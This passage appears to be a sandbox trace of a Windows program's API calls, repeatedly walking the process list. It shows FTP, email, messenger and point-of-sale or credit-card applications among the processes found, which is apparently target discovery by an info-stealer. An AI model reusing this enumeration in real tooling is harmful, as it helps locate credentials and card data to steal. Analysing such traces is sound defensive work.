th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0266.115] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0266.116] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0266.118] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0266.120] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0266.158] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0266.159] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0266.161] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0266.163] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0266.165] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0266.167] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0266.173] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0266.175] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0266.177] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0266.179] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0266.181] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0266.183] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0266.188] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0266.190] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0266.191] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0266.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0266.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0266.196] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0266.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0266.292] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0266.295] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0266.296] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0266.298] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0266.300] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0266.302] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0266.304] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0266.305] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0266.307] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0266.310] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0266.312] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0266.313] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0266.315] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0266.317] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0266.318] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0266.320] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0266.322] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0266.324] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0266.326] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0266.331] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0266.333] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0266.334] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0266.336] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0266.337] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0266.339] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0266.341] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.343] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.345] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0266.346] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.348] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0266.349] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0266.351] CloseHandle (hObject=0x758) returned 1 [0266.351] Sleep (dwMilliseconds=0x64) [0266.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0266.502] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.504] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.506] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.509] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.511] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.513] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.515] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.516] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.518] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.527] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.528] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.530] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.532] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.533] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.534] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.536] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.537] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.539] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.541] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.542] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.544] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0266.545] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0266.547] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.550] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.552] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0266.553] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0266.555] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0266.558] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.561] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, 